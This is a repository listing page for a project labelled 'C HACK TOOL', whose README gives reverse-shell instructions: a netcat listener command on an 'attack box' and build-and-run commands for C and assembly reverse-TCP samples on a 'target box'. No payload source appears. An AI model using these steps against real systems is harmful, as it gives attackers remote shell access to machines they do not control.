https://github.com/dewebdes/bismil
C HACK TOOL
https://github.com/dewebdes/bismil
Last synced: about 1 year ago
JSON representation
C HACK TOOL
- Host: GitHub
- URL: https://github.com/dewebdes/bismil
- Owner: dewebdes
- Created: 2019-10-24T18:05:30.000Z (over 6 years ago)
- Default Branch: master
- Last Pushed: 2020-01-24T22:30:10.000Z (over 6 years ago)
- Last Synced: 2025-02-08T12:46:14.186Z (over 1 year ago)
- Language: Assembly
- Size: 12.7 MB
- Stars: 0
- Watchers: 2
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
BISMIL
Pure way to start hacking programming in C and Assembly languages
ON ATTACK BOX RUN:
nc -lvp 444
ON TARGET BOX:
- We need an signal, like exe file or just a tcp request
-
PURE C Sample
gcc rsv.c -o rsv
sudo ./rsv
-
ASM Sample
nasm -f elf32 reverse_tcp.asm && ld -m elf_i386 reverse_tcp.o -o reverse_tcp